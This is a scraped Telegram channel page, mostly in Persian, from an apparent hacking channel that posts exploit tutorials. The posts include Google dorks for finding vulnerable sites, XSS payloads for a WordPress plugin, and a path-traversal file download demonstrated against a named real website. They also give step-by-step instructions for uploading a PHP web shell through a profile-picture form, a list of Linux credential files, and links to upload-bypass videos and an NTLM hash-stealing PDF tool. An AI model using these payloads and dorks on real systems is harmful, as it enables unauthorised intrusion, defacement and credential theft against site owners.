0Day.Today | Learn Exploit | Zero World | Dark web |
18.9K subscribers
1.23K photos
125 videos
489 files
1.28K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
اموزش burpSuit برای دور زدن uploader ها
#Learning #BurpSuit on #Kalilinux (2018.2) for #Upladers #Bypassing
=====
@LearnExploit
--> 0Day.Today of TON
0Day.Today | Learn Exploit | Zero World | Dark web |
اموزش burpSuit برای دور زدن uploader ها #Learning #BurpSuit on #Kalilinux (2018.2) for #Upladers #Bypassing ===== @LearnExploit --> 0Day.Today of TON
اموزش burpSuit برای دور زدن uploader ها
#Learning #BurpSuit on #Kalilinux (2018.2) for #Upladers #Bypassing
=====
مباحثی که در بخش گفته شده :
1 - کانفیگ burp Suit بر روی مرورگر firefox (تقریبا روی همه ی مرورگر ها یکی هست )
2 - نحوه ی بایپس uploader و بایپس حجم فایل ها !
3 - استفاده از متد هایی برای اجرا شدن فایل های PHP (به جای نشان دادن لینک دانلود)
=====
File Size : 68 MG
Time : 14 min
Dl LINK : http://www.mediafire.com/file/n9b28lgqkm5vx87/BurpSuit.rar
=====
@LearnExploit
--> 0Day.Today of TON
دوستان توجه کنید جدیدا گروهی تبلیغ سایت فروش فیلم ایران زندادن را میکنند که به درگاه فیشینگ متصل هست و اطلاعات کارت بانکی شمارو میخواد خودشم به قیمت ناچیز 2000 T :) مراقب باشید @learnexploit
اموزش XSS در دو سطح low و medium
#Xss #Learning in Two levels : #Low #Medium security
—————
0Day.Today boy's
t.me/LearnExploit
0Day.Today | Learn Exploit | Zero World | Dark web |
اموزش XSS در دو سطح low و medium #Xss #Learning in Two levels : #Low #Medium security ————— 0Day.Today boy's t.me/LearnExploit
اموزش XSS در دو سطح low و medium
#Xss #Learning in Two levels : #Low #Medium security
—————
بخش هایی که در این فیلم یاد میگیرید :
1 - تست نفوذ XSS در سطح low
2 - رفع این اسیب پذیری از سطح low به medium
3 - تست نفوذ XSS در سطح Medium
—————
Time : 6 min
Qul : 1080
file size : 36 mg
dl link : http://www.mediafire.com/file/sp8x511qm3bkw5p/Xss%20Learning.rar
—————
0Day.Today boy's
t.me/LearnExploit
0Day.Today | Learn Exploit | Zero World | Dark web |
POC اسیب پذیریه XSS در پلاگین (All In One Favicon ) : #XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon 0Day.Today Boy's @LearnExploit
اسیب پذیریه XSS در پلاگین (All In One Favicon ) :
#XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon
—————-
این اسیب پذیری در نسخه های پاین تر از 4.6 به هکر اجازه ی اجرا کردن کد های جاوا اسکریپت رو میده
url : http://localhost/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php
==
پارامتر هایی که این اسیب پذیریو دارند :
backendApple-Text
backendICO-Text
backendPNG-Text
backendGIF-Text
frontendApple-Text
frontendICO-Text
frontendPNG-Text
frontendGIF-Text
==
پیلود هایی که برای این اسیب پذیری استفاده میشه :
"><img src=a onerror=alert(1)>
"><img src=a onerror=alert(String.fromCharCode(88,83,83))>
==
Exploit link :
https://www.exploit-db.com/exploits/45056/
—————————
0Day.Today Boy's
@LearnExploit
1
اسیب پذیری (FTP2FTP ( Arbitrary File Download :
در این اسیب پذیری شما میتوانید تمام فایل هایی که توسط ادمین سایت اپلود شده است رو دانلود کنید !

Dork : inurl:/download2.php?id=

Exploit :
http(s)://host.com/[patch]?id=../index.php
or
http(s)://host.com/[patch]?id=/index.php

POC :
before exploit :
http://www.supersat.cz/download/azbox/download2.php?id=23
after exploit :
http://www.supersat.cz/download/azbox/download2.php?id=../index.php
=========================
0Dya.Today Boy's
T.me/LearnExploit
👍1
✔️ مکان #اطلاعات_مهم در سیستم لینوکس شما

/etc/resolv.conf
-> سرورهای فعلی (DNS) برای سیستم

/etc/motd
-> پیام روز

/etc/issue
-> نسخه فعلی توزیع لینوکس شما

/etc/passwd
-> فهرست کاربران محلی

/etc/shadow
-> لیست هشهای کلمه عبور کاربران (نیاز به دسترسی روت)

@LearnExploit
اسیب پذیری فایل اپلود در پلاگین (Responsive Thumbnail Slider )
WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit)
============
@LearnExploit
0Day.Today | Learn Exploit | Zero World | Dark web |
اسیب پذیری فایل اپلود در پلاگین (Responsive Thumbnail Slider ) WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit) ============ @LearnExploit
اسیب پذیری فایل اپلود در پلاگین (Responsive Thumbnail Slider )
WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit)
============
Dorks :
inurl:"/wp-content/uploads/wp-responsive-images-thumbnail-slider/"
or
inurl:"/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt"

exploit :
https://www.exploit-db.com/exploits/45099/

depends :
Metasploit
============
0Day.Today
@LearnExploit
Upload shell & SQLi :
~~~~~~~~~~~~~~~~~
Dorks#
|~
inurl:"post.php?p_id="
inurl:"/category.php?category="
—————————————-
Exploit#
|~
1 ) ابتدا در سایت ثبت نام کنید
2) وارد پنل خود شید
3) به مسیر /profile برید
4)شل خودتونو با shel.phtml اپلود کنید
5) مسیر شل :
http://[target]/assets/images/profile_pics/your shell.phtml
——————————————
— > @LearnExploit
اموزش کاتانا ! در کالی لینوکس 2018.2
#Script #Katana OS (#KALI 2018.2)
—————-
0Day.Today Boy's
T.me/LearnExploit
Bad-Pdf - Steal NTLM Hashes With A PDF From Windows Machines.

[+] GitHub : https://github.com/deepzec/Bad-Pdf

#Uzi
@LearnExploit
اموزش کار با ابزار wafw00f در کالی برای تشخیص بودن یا نبودن firewall در سایت
#WaffW00f On #Kalilinux 2018.2
...
@LearnExploit
This media is not supported in your browser
VIEW IN TELEGRAM
اموزش کار با ابزار wafw00f در کالی برای تشخیص بودن یا نبودن firewall در سایت
#WaffW00f On #Kalilinux 2018.2
...
@LearnExploit